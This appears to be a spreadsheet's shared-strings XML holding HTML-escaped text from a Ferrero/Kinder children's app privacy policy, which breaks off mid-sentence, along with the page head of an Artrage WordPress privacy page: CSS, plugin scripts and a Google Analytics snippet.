  </si>
  <si>
    <t>This is expressed by the preferences you set and those can be toggled on or off at any time in your device’s settings;&lt;/li&gt;
							&lt;li style="list-style: lower-roman"&gt;When processing data for the purpose of following up on abuse reports, we will rely on Art. 6(1)(f) GDPR – to meet our legitimate interests in ensuring that abuse reports are correctly addressed;&lt;/li&gt;
							&lt;li style="list-style: lower-roman"&gt;When processing data for the purpose of cooperating with law enforcement, we will rely on Art. 6(1)(c) GDPR, as such activities will only be carried out to the extent that we are legally obliged to provide this cooperation.&lt;/li&gt;
                        &lt;/ul&gt;
                        &lt;p&gt;You can ask us for more information on our assessments concerning our legitimate interests by reaching out to us at &lt;a href="mailto:privacy@ferrero.com"&gt;privacy@ferrero.com&lt;/a&gt;.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;</t>
  </si>
  <si>
    <t>What information does the App obtain and how is it used?&lt;/h2&gt;
                        &lt;p&gt;&lt;strong&gt;User Provided Information&lt;/strong&gt;&lt;/p&gt;
                        &lt;p&gt; The App obtains the information you provide when you download and register within the App. No personal information is requested through the registration process as mandatory in order to be able to use the basic features of the App.</t>
  </si>
  <si>
    <t>Further information shall be requested as optional upon registration or after parent verification, in order to allow you to use some of the features offered by the App (such as resuming or saving your game progress and activity). The registration process is currently intended for and directed to parents/grown-ups within the parent section of the App and utilizes Children's Online Privacy Protection Act (COPPA)-compliant procedures to allow for the collection of certain account information from parents with verification of a parent’s year of birth. When you register with us and use the App, you generally provide (a) your year of birth and email address; (b) information you provide us when you contact us for help.</t>
  </si>
  <si>
    <t>We may also use the information you provided us to contact you from time to time to provide you with important information, required notices and, with your prior consent expressed during registration, marketing promotions.&lt;/p&gt;
                        &lt;p&gt;Please note that certain sections of the App will ask for access to parts of your device – namely, the camera, the microphone and the storage. When you access these sections, a pop-up will ask you to allow the App permission to access the relevant parts of your device. You can adjust permissions given within the settings of your device itself – for more information, click &lt;a id="support-link"&gt;here&lt;/a&gt;.</t>
  </si>
  <si>
    <t>If you deny or remove this access, those sections of the App may not work fully as intended.&lt;/p&gt;
                        &lt;p&gt;Certain sections of the App also allow photographs and videos to be taken, which may capture personal data related to the user of the device, or to third parties. This information is in anyway not disclosed to any third parties.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Automatically Collected Information&lt;/h2&gt;
                        &lt;p&gt; In addition, the App may collect certain information automatically, including, but not limited to, the type of mobile device you use, your mobile unique device ID, the IP address of your mobile device, your mobile operating system and language, the type of mobile Internet browsers you use, and information about the way you use the App (such as information about your game progresses and activity).</t>
  </si>
  <si>
    <t>The App may access certain device information and/or components automatically. This collection is only for the purpose of providing the services within the App you choose to use. This information is not linked to personal information about the user.</t>
  </si>
  <si>
    <t xml:space="preserve">A push notification token will be used to send push notifications to your mobile device with updates and suggestions upon request (e.g., through scanning QR codes) or automatically (e.g., by means of audio watermarks). These notifications would only be activated from the parent section of the App and directed to parents.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Research Activities – Learning for Families Through Technology&lt;/h2&gt;
                        &lt;p&gt;During your use of the App, you may be asked to participate in a research project entitled “Learning for Families through Technology” (“Project”), which is led by The Chancellor Masters and Scholars of the University of Oxford (“University of Oxford”). The Project aims to investigate the use of technology to support children’s learning by using the App as a research tool.&lt;/p&gt; 
						</t>
  </si>
  <si>
    <t>&lt;p&gt; In the context of the Project, Ferrero will share some limited details related to how you/your children use the App (for example, the average time spent on the App, progress made on the App, levels achieved, features used, and so on) with the University of Oxford. Only these details will be associated with a pseudonymized ID number assigned to you as a user, which will not allow the University of Oxford to specifically identify you or your children – this will only allow the University of Oxford to distinguish the details related to you from those related to other App users.&lt;/p&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>Furthermore, when using the App, you may be asked to carry out specific surveys related to the Project. Taking part in any of these surveys is totally optional – you can also simply ignore these surveys and continue to use the App as normal. However, if you decide to take part, you have to provide an email address where you will receive a link that once clicked will redirect you to a specific website where the surveys -created by the University of Oxford- can be filled.</t>
  </si>
  <si>
    <t>The email address you provided will be deleted once you completed the survey or, in case you will not fill out the survey, after 30 days. The answers which you may provide in these surveys will be shared with the University of Oxford and matched with the pseudonymized ID number assigned to you as a user. This match will not allow the University of Oxford to specifically identify you or your children, but only to distinguish the answers you have given from those given by other App users.</t>
  </si>
  <si>
    <t>Your survey answers may be retained for up to 3 years after publication of the Project’s findings and then deleted.&lt;/p&gt;                        
                        &lt;p&gt; The Project’s findings (which will also not contain any information identifying you or your children) may be published in academic papers, as well as shared back with Ferrero. We may ultimately use these to further develop the App’s contents and offerings.&lt;/p&gt; 
						&lt;p&gt;Both Ferrero and the University of Oxford act as joint controllers for the processing of personal data related to the Project.</t>
  </si>
  <si>
    <t>The processing of your personal data in the context of the Project is primarily based on:&lt;/p&gt;
                        &lt;ul&gt;
                            &lt;li&gt;Ferrero’s and Oxford’s legitimate interests in carrying out research activities, under Art. 6(1)(f) GDPR, regarding the sharing of limited details related to how you/your children use the App; and&lt;/li&gt;
                            &lt;li&gt;Your consent, under Art. 6(1)(a) GDPR, regarding the email address you provide to receive the survey link and the sharing of answers you may provide to surveys related to the Project.&lt;/li&gt;
                        &lt;/ul&gt;
						&lt;p&gt;If you would like to have more information about the relationship between Ferrero and the University of Oxford, including on the main terms of the agreement we have entered into with the University of Oxford regarding the Project, please contact us at &lt;a href="mailto:privacy@ferrero.com"&gt;privacy@ferrero.com&lt;/a&gt;.&lt;/p&gt;  
						&lt;p&gt;&amp;nbsp;&lt;/p&gt;                        
						&lt;h2&gt;Does the App collect and track any personal data such as face data through the use of TrueDepthAPI?&lt;/h2&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>The App uses the device’s TrueDepthAPI camera system to track the movement of the face. This allows for a unique user experience embodying your favourite character. In order for this functionality to be possible, the App requires access to your device’s camera.</t>
  </si>
  <si>
    <t>This access can be toggled on or off at any time in your device’s settings. We do not collect, store or share data used by software for depth of facial mapping information, TrueDepthAPI locally or remotely. In addition, we do not disclose this information to any third parties.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Does the App collect precise real time location information of the device?&lt;/h2&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>This App does not collect precise information about the location of your mobile device.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt; Do we use cookies or similar technologies on the App?&lt;/h2&gt;
                        &lt;p&gt;Cookies are small text files that the sites visited send to you and store on your computer or mobile device, and which will be returned to these same sites on each new visit. Thanks to these cookies, a site remembers your actions and preferences (for example connection data, preferred language, font dimensions, other display settings, etc.)</t>
  </si>
  <si>
    <t>so that you do not have to need to specify them again when you return to the site or consult another page on the same site.&lt;/p&gt;
                        &lt;p&gt; The App generally does not use cookies or similar tracking technologies. However, in the context of the Project carried out with the University of Oxford, we use Google’s reCAPTCHA tool, which will set cookies on your device when you choose to participate in a Project-related survey.&lt;/p&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>These cookies serve to detect if the survey is being answered by a human or by a bot. As such, they are primarily used for security purposes. However, Google may also use these cookies to gather additional information from App users for the purpose of improving its own services and products.</t>
  </si>
  <si>
    <t>Google acts as the sole controller for any personal data collected for these latter purposes – please consult &lt;a href="https://policies.google.com/privacy"&gt;Google’s Privacy Notice&lt;/a&gt; for more information on how Google may handle your personal data.&lt;/p&gt;
                        &lt;p&gt; These cookies will be set on your device where you consent to this, by clicking on “Accept” within the cookie banner shown when you access a given survey. This consent can be refused or withdrawn through that same banner, or through the cookie management tools offered on the survey website.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Do third parties see and/or have access to information obtained by the App?&lt;/h2&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>On a normal basis, only aggregated, anonymized data is periodically transmitted to external services to help us improve the App and our service, e.g., maintenance and hosting services. We will share your information with third parties only in the ways that are described in this privacy policy.&lt;/p&gt;
                        &lt;p&gt; We may disclose User Provided Information and/or User Automatically Collected Information:&lt;/p&gt;
                        &lt;ul&gt;
                            &lt;li&gt;as required by law, such as to comply with a subpoena, or similar legal process;&lt;/li&gt;
                            &lt;li&gt;when we believe in good faith that disclosure is necessary to protect our rights, protect your safety or the safety of others, investigate fraud, or respond to a government request;&lt;/li&gt;
                            &lt;li&gt;with our trusted services providers who work on our behalf, do not have an independent use of the information we disclose to them, and have agreed to adhere to the rules set forth in this privacy statement;&lt;/li&gt;
                            &lt;li&gt;with our research partners, including the University of Oxford (in the context of the Project, as explained above).&lt;/li&gt;
                        &lt;/ul&gt;
                        &lt;p&gt;If Ferrero is involved in a merger, acquisition, or sale of all or a portion of its assets, you will be notified via a prominent notice on our Website of any change in ownership or uses of this information, as well as any choices you may have regarding this information.&lt;/p&gt;
                        &lt;p&gt;Other than the above, limited internal staff at Ferrero may have access to personal data collected via the App, as necessary to perform their duties regarding the operation of the App.</t>
  </si>
  <si>
    <t>These data will only be accessed on a need-to-know basis, and all staff members with access to the data are bound to confidentiality.&lt;/p&gt;
                        &lt;p&gt; Moreover by using ML Kit – Face detection in our App, Google might access metrics data, which are non-personal data. Google uses this metrics data to measure performance, debug, maintain and improve the APIs, and detect misuse or abuse, as further described in their Privacy Policy.</t>
  </si>
  <si>
    <t>The processing of the input data (e.g. images, video, text) fully happens on-device, and ML Kit does not send that data to Google servers.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Advertising&lt;/h2&gt;
                        &lt;p&gt; We do not have any advertising in our App. At times, we may promote the App via internet advertising.</t>
  </si>
  <si>
    <t>If you click on such an advertisement on an external web site and navigate directly to the iTunes App Store or other platform, with the use of web cookie and similar technologies (You can refer to our &lt;a href="https://www.kinder.com/us/en/cookie-policy"&gt;Cookies Policy&lt;/a&gt; on kinder.com to learn more about opting out of such technologies) or non-identifying information such as your phone's device ID may be sent to the advertising network, so that they and we may track the effectiveness (i.e., conversions) of our advertising. In addition to conversion events, it might also be used for frequency capping, estimating the number of unique users, debugging, or security and fraud detection. When you use the App, a unique ID (which varies by device manufacturer and operating system) is read from or associated with your device to be used as an anonymous identifier for analytics and performance purposes.</t>
  </si>
  <si>
    <t>We don't store the ID, or share the ID or other unique information collected or used by the app with third parties, except for service providers whose analytics product generates this ID to track and analyse the performance and the quality of our App. We do not use information gathered within the App to serve you targeted advertisements.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt; Your rights&lt;/h2&gt;
                        &lt;p&gt;You can stop all collection of information by the App easily by uninstalling the App.</t>
  </si>
  <si>
    <t>You may use the standard uninstall processes as may be available as part of your mobile device or via the mobile application marketplace or network. Please note that you may at any time exercise your rights of access, rectification, erasure, opposition, restriction of processing and portability with respect to your personal data by writing to our email address &lt;a href="mailto:privacy@ferrero.com"&gt;privacy@ferrero.com&lt;/a&gt;. See below for parental rights with respect to children's data.&lt;/p&gt;
                        &lt;p&gt;You can withdraw your consent to receive email newsletters at any time, by adjusting the preferences you set on the App or by clicking on a link available in each communication and newsletter we send you.&lt;/p&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>You are entitled to file a complaint with the competent supervisory authority, in the event that you deem any aspect of our processing of personal data to be unlawful. For these purposes, you can reach out to:&lt;/p&gt;
                        &lt;ul&gt;
                            &lt;li&gt;&lt;a href="https://cnpd.public.lu/en.html"&gt;The Luxembourg &lt;b&gt;National Data Protection Commission&lt;/b&gt;&lt;/a&gt; (the supervisory authority within Ferrero’s place of establishment);</t>
  </si>
  <si>
    <t>or&lt;/li&gt;
                            &lt;li&gt;The competent supervisory authority within your area of residence or place of work, within the EU/EEA.&lt;/li&gt;
                        &lt;/ul&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Data processor&lt;/h2&gt;
                        &lt;p style="overflow-wrap: break-word;"&gt;Ferrero has chosen some third parties to assist us in processing your personal data, we have taken reasonable steps to ensure that they comply with this Privacy Policy and otherwise protect your personal data.&lt;/p&gt;
                        &lt;ul&gt;
                            &lt;li&gt;Ferrero has chosen Amazon Web Services, Inc. (AWS) as the cloud service provider to store your data. The Article 29 Working Party (the independent advisory board made up of representatives from the data protection authorities of all the EU Member States as well as from the European Commission) has approved the AWS Data Processing Agreement, which includes the Model Clauses. The Article 29 Working Party has found that the AWS Data Processing Agreement meets the requirements of the Directive with respect to Model Clauses.</t>
  </si>
  <si>
    <t>For more detail on the approval of the AWS Data Processing Agreement from the Article 29 Working Party, please visit: &lt;a href="https://www.cnpd.public.lu/en/actualites/international/2015/03/AWS.html"&gt;https://www.cnpd.public.lu/en/actualites/international/2015/03/AWS.html&lt;/a&gt;&lt;/li&gt;
                            &lt;li&gt;Ferrero has chosen Google Firebase Crashlytics as crash reporting software to collect insights into the nature of stability problems you may face through some Automatically Collected Information. Analytics information is used to support Ferrero analysis and operations, to enable product development and to improve our APP and services.&lt;/li&gt;
                            &lt;li&gt;Ferrero has chosen Gameloft SE as software developer for maintenance and for the improvement of the APP; it may therefore have access from time to time to some collected data.&lt;/li&gt;
                        &lt;/ul&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Data Retention Policy, Managing Your Information&lt;/h2&gt;
                        &lt;ul&gt;
                            &lt;li&gt;When you register on the App, we will send you an e-mail so that you can confirm your registration. If you do not confirm your registration right away, we will keep the User Provided Information you shared with us during your registration for a period of 14 days, before erasing it (unless you confirm your registration in the meantime).</t>
  </si>
  <si>
    <t>After you have confirmed your registration, we will retain User Provided Information for as long as you use the App. If your account remains inactive for a consecutive period of 12 months, we will erase the User Provided Information we have on you (unless further retention is needed to meet our legal obligations, or to address legal claims) – we will send you an e-mail notice of this 1 month before deletion is to take place.&lt;/li&gt;
                            &lt;li&gt;After you have confirmed your registration on the App, we will generally retain User Provided Information for as long as you continue to use the App.&lt;/li&gt;
                            &lt;li&gt;Photographs which are taken using the App are stored locally, on the App’s memory of your device – they will be retained until the App is uninstalled. Other images which may be generated using the App (such as drawings or images of QR codes) may be stored on the App’s memory (in which case, the above applies) or on your device’s camera roll – in this case, you can delete those images at any time through your device.&lt;/li&gt;
                            &lt;li&gt;The backup of your data will be stored on Ferrero’s AWS for as long as you use the App.</t>
  </si>
  <si>
    <t>If your account remains inactive for a consecutive period of 12 months, we will erase the backup of your data.&lt;/li&gt;
                            &lt;li&gt;We will retain Automatically Collected Information for up to 12 months and thereafter may store it in aggregate form. If you'd like us to delete User Provided Information that you have provided via the App, please contact us at &lt;a href="mailto:privacy@ferrero.com"&gt;privacy@ferrero.com&lt;/a&gt;.&lt;/li&gt;
                            &lt;li&gt;Personal data collected in the context of research activities (including User Provided Information, Automatically Collected Information and answers to surveys, for example) will be pseudonymized or aggregated as soon as this is feasible without compromising the goals of the specific research project for which they are collected.&lt;/li&gt;
                        &lt;/ul&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Children&lt;/h2&gt;
                        &lt;p style="overflow-wrap: break-word;"&gt;We do not use the App to knowingly solicit data from or market to people aged under 18. No personal information should be submitted by Children and their real name or any information should never be used in the feature of the App (such as the creation of an avatar).</t>
  </si>
  <si>
    <t>If a parent or guardian becomes aware that his or her child has provided us with information without their consent, he or she should contact us at &lt;a href="mailto:privacy@ferrero.com"&gt;privacy@ferrero.com&lt;/a&gt;. We will delete such information from our files within a reasonable time. If we were to collect and store personal information from children under the age of 18 in connection with a feature inside the App, we will first take steps to notify and obtain prior consent from a parent or legal guardian in accordance with applicable laws such as the COPPA, unless an exception to these laws applies.</t>
  </si>
  <si>
    <t>We would also give parents the ability to review their children's personal information, stop the further collection or use of such information, or request its deletion. To learn more about COPPA, you may consult this simple one-page informational guide from the kidSAFE Seal Program: &lt;a href="https://www.kidsafeseal.com/knowaboutcoppa.html"&gt;https://www.kidsafeseal.com/knowaboutcoppa.html&lt;/a&gt;&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt; Security&lt;/h2&gt;
                        &lt;p&gt;Information security is important to Ferrero and we are concerned about safeguarding the confidentiality of your information.</t>
  </si>
  <si>
    <t>We have established physical, electronic, managerial and procedural safeguards to protect the information we collect, process and maintain. These safeguards are regularly reviewed to protect against unauthorized access, disclosure and improper processing of your information, and to maintain the accuracy and integrity of that data. For example, we limit access to this information to authorized employees and contractors who need to know that information in order to operate, develop or improve our App.</t>
  </si>
  <si>
    <t>Please be aware that, although we endeavour to provide reasonable security for information we process and maintain, no security system can prevent all potential security breaches. For technical and operational reasons, personal data can be transferred through servers which are located outside the European Union, where the European data protection rules are not applicable. Privacy regulations outside the EU might not provide the same high level of protection.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;Changes&lt;/h2&gt;
                        &lt;p&gt;</t>
  </si>
  <si>
    <t>This Privacy Policy may be updated from time to time for any reason. We will notify you of any material changes to our Privacy Policy by e-mail. We will also post the new Privacy Policy on our website &lt;a href="https://www.magic-kinder.com/"&gt;www.kinder.com&lt;/a&gt; and update the date shown above.&lt;/p&gt;
                        &lt;p&gt;&amp;nbsp;&lt;/p&gt;
                        &lt;h2&gt;</t>
  </si>
  <si>
    <t>Contact us&lt;/h2&gt;
                        &lt;p&gt;&lt;strong&gt;For privacy rela</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en-US"&gt;
&lt;head&gt;
&lt;meta charset="UTF-8"&gt;
&lt;meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"&gt;
&lt;link rel="profile" href="http://gmpg.org/xfn/11"&gt;
&lt;title&gt;Privacy &amp;#8211; Artrage&lt;/title&gt;
&lt;meta name="robots" content="max-image-preview:large" /&gt;
&lt;link rel="dns-prefetch" href="//www.googletagmanager.com" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Artrage &amp;raquo; Feed" href="https://www.artrage.com/feed/" /&gt;
&lt;link rel="alternate" type="application/rss+xml" title="Artrage &amp;raquo; Comments Feed" href="https://www.artrage.com/comments/feed/" /&gt;
&lt;script&gt;
 window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.artrage.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.2"}};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</si>
  <si>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&lt;style&gt;
img.wp-smiley,
img.emoji {
	display: inline ! important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 0.07em ! important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
&lt;/style&gt;
	&lt;link rel="stylesheet" id="wp-block-library-css" href="https://www.artrage.com/wp-includes/css/dist/block-library/style.min.css?ver=6.2" media="all" /&gt;
&lt;link rel="stylesheet" id="classic-theme-styles-css" href="https://www.artrage.com/wp-includes/css/classic-themes.min.css?ver=6.2" media="all" /&gt;
&lt;style id="global-styles-inline-css"&gt;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t>
  </si>
  <si>
    <t>6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow &gt; .alignleft{float:</t>
  </si>
  <si>
    <t>important;}body .is-layout-constrained &gt; :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto ! important;}body .is-layout-constrained &gt; .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex &gt; *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-color{color: var(--wp--preset--color--white) ! important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) ! important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) ! important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !</t>
  </si>
  <si>
    <t>important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) ! important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) ! important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) ! important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) ! important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !</t>
  </si>
  <si>
    <t>important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) ! important;}.has-white-border-color{border-color: var(--wp--preset--color--white) ! important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) ! important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) ! important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !</t>
  </si>
  <si>
    <t>important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) ! important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) ! important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !</t>
  </si>
  <si>
    <t>important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) ! important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) ! important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !</t>
  </si>
  <si>
    <t>important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) ! important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) ! important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !</t>
  </si>
  <si>
    <t>important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) ! important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) ! important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !</t>
  </si>
  <si>
    <t>important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) ! important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) ! important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !</t>
  </si>
  <si>
    <t>important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) ! important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) ! important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !</t>
  </si>
  <si>
    <t>important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) ! important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) ! important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !</t>
  </si>
  <si>
    <t>important;}
.wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;}
:where(.wp-block-columns.is-layout-flex){gap: 2em;}
.wp-block-pullquote{font-size: 1.5em;line-height: 1.6;}
&lt;/style&gt;
&lt;link rel="stylesheet" id="easy-facebook-likebox-custom-fonts-css" href="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/css/esf-custom-fonts.css?ver=6.2" media="all" /&gt;
&lt;link rel="stylesheet" id="jquery.fancybox.min-css" href="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/css/jquery.fancybox.min.css?ver=6.2" media="all" /&gt;
&lt;link rel="stylesheet" id="owl.carousel.min-css" href="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/css/owl.carousel.min.css?ver=6.4.5" media="all" /&gt;
&lt;link rel="stylesheet" id="owl.theme.default-css" href="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/css/owl.theme.default.min.css?ver=6.4.5" media="all" /&gt;
&lt;link rel="stylesheet" id="easy-facebook-likebox-frontend-css" href="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/facebook/frontend/assets/css/easy-facebook-likebox-frontend.css?ver=6.4.5" media="all" /&gt;
&lt;link rel="stylesheet" id="easy-facebook-likebox-customizer-style-css" href="https://www.artrage.com/wp-admin/admin-ajax.php?action=easy-facebook-likebox-customizer-style&amp;#038;ver=6.4.5" media="all" /&gt;
&lt;link rel="stylesheet" id="foobox-free-min-css" href="https://www.artrage.com/wp-content/plugins/foobox-image-lightbox/free/css/foobox.free.min.css?ver=2.7.25" media="all" /&gt;
&lt;link rel="stylesheet" id="ivory-search-styles-css" href="https://www.artrage.com/wp-content/plugins/add-search-to-menu/public/css/ivory-search.min.css?ver=5.5" media="all" /&gt;
&lt;link rel="stylesheet" id="child-understrap-styles-css" href="https://www.artrage.com/wp-content/themes/understrap-child-mod/css/child-theme.min.css?ver=1655433381" media="all" /&gt;
&lt;link rel="stylesheet" id="esf-custom-fonts-css" href="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/css/esf-custom-fonts.css?ver=6.2" media="all" /&gt;
&lt;link rel="stylesheet" id="esf-insta-frontend-css" href="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium//instagram/frontend/assets/css/esf-insta-frontend.css?ver=6.2" media="all" /&gt;
&lt;link rel="stylesheet" id="esf-insta-customizer-style-css" href="https://www.artrage.com/wp-admin/admin-ajax.php?action=esf-insta-customizer-style&amp;#038;ver=6.2" media="all" /&gt;
&lt;script src="https://www.artrage.com/wp-includes/js/jquery/jquery.min.js?ver=3.6.3" id="jquery-core-js"&gt;&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.0" id="jquery-migrate-js"&gt;&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/facebook/frontend/assets/js/esf-free-popup.min.js?ver=6.4.5" id="easy-facebook-likebox-popup-script-js"&gt;&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/js/jquery.fancybox.min.js?ver=6.2" id="jquery.fancybox.min-js"&gt;&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/js/owl.carousel.min.js?ver=6.4.5" id="owl.carousel.min-js"&gt;&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/frontend/assets/js/imagesloaded.pkgd.min.js?ver=6.2" id="imagesloaded.pkgd.min-js"&gt;&lt;/script&gt;
&lt;script id="easy-facebook-likebox-public-script-js-extra"&gt;
var public_ajax = {"ajax_url":"https:\/\/www.artrage.com\/wp-admin\/admin-ajax.php","efbl_is_fb_pro":"1"};
&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/facebook/frontend/assets/js/public.js?ver=6.4.5" id="easy-facebook-likebox-public-script-js"&gt;&lt;/script&gt;
&lt;script id="easy-facebook-likebox-frontend-premium-js-extra"&gt;
var efbl_public_ajax = {"ajax_url":"https:\/\/www.artrage.com\/wp-admin\/admin-ajax.php","nonce":"8228b63351"};
&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium/facebook/frontend/assets/js/esf-frontend-premium.js?ver=6.4.5" id="easy-facebook-likebox-frontend-premium-js"&gt;&lt;/script&gt;
&lt;script id="esf-insta-public-js-extra"&gt;
var esf_insta = {"ajax_url":"https:\/\/www.artrage.com\/wp-admin\/admin-ajax.php","version":"free","nonce":"af7f906d51"};
&lt;/script&gt;
&lt;script src="https://www.artrage.com/wp-content/plugins/easy-facebook-likebox-premium//instagram/frontend/assets/js/esf-insta-public.js?ver=1" id="esf-insta-public-js"&gt;&lt;/script&gt;
&lt;script src="https://www.googletagmanager.com/gtag/js?id=UA-7620131-1" id="google_gtagjs-js" async&gt;&lt;/script&gt;
&lt;script id="google_gtagjs-js-after"&gt;
window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
gtag('set', 'linker', {"domains":["www.artrage.com"]} );
gtag("js", new Date());
gtag("set", "developer_id.dZTNiMT", true);
gtag("config", "UA-7620131-1", {"anonymize_ip":true});
&lt;/script&gt;
